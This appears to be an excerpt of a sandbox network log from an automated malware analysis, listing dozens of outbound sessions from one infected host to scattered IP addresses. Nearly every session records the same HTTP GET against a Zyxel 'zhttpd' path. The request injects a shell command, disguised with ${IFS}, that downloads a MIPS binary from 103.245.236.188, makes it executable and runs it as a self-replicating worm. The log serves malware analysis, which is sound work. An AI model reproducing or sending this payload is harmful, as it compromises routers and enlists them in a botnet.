                                    Jan 13, 2024 19:02:30.082187891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3397192.168.2.135529017.86.213.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082268000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3398192.168.2.1348310165.28.186.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082298040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3399192.168.2.1359942170.229.13.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082359076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3400192.168.2.135610287.50.106.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082423925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3401192.168.2.1353154189.246.192.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082495928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3402192.168.2.1335382209.201.188.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082534075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3403192.168.2.1357148124.151.83.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082600117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3404192.168.2.1356980213.194.2.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082633018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3405192.168.2.1344500200.158.209.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082712889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3406192.168.2.1360402107.107.15.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082772970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3407192.168.2.1356574179.244.75.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082828999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3408192.168.2.1360846192.42.35.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082895994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3409192.168.2.1360372208.55.124.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082968950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3410192.168.2.1359216148.77.7.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083025932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3411192.168.2.1332994128.183.138.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083090067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3412192.168.2.134759025.203.201.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083128929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3413192.168.2.136097013.122.141.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083184958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3414192.168.2.133646093.3.50.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083245993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3415192.168.2.1346836173.155.8.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083312988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3416192.168.2.1334098176.105.85.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083378077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3417192.168.2.136024081.222.9.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083439112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3418192.168.2.13333201.228.22.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083498955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3419192.168.2.134640894.254.128.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083560944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3420192.168.2.133412685.12.176.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083627939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3421192.168.2.134305495.144.73.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083666086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3422192.168.2.1336674161.203.94.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083715916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3423192.168.2.1347232205.28.14.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083791018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3424192.168.2.133752043.231.207.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083894968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3425192.168.2.1351824132.24.60.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083933115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3426192.168.2.1350596121.122.231.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.083993912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3427192.168.2.1346510129.146.222.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084034920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3428192.168.2.1352280128.81.252.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084079027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3429192.168.2.1341632143.155.7.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084155083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3430192.168.2.1355240132.148.188.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084192991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3431192.168.2.1334648199.238.21.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084233999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3432192.168.2.135459278.60.255.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084287882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3433192.168.2.135509458.93.96.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084338903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3434192.168.2.136039654.17.81.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084381104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3435192.168.2.1355678165.93.251.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084461927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3436192.168.2.135524667.66.208.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084534883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3437192.168.2.1346448219.122.59.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084567070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3438192.168.2.134934669.137.14.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084650993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3439192.168.2.1351016102.228.165.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084732056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3440192.168.2.1342824172.46.114.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084781885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3441192.168.2.135693459.173.176.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084814072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3442192.168.2.135401046.81.230.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084911108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3443192.168.2.1342496126.189.224.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.084969044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3444192.168.2.1359496112.162.227.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.085022926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3445192.168.2.134677887.151.25.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.085084915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3446192.168.2.134138498.77.147.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.085153103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3447192.168.2.134641051.56.16.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.085208893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3448192.168.2.1355990147.154.140.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.085235119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3449192.168.2.134085063.193.108.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.085294008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3450192.168.2.133606285.142.231.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.085391045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3451192.168.2.135622687.206.216.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.085445881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3452192.168.2.1352980218.62.189.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.085483074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3453192.168.2.1340568170.77.220.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.085571051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3454192.168.2.1354730176.157.58.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.085629940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3455192.168.2.1347092173.96.248.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.085690022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3456192.168.2.1340250190.240.53.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.085778952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3457192.168.2.135616073.89.22.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.085822105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3458192.168.2.134649825.52.225.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.085900068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3459192.168.2.1344014160.165.100.216443
                                    TimestampBytes transferredDirectionData
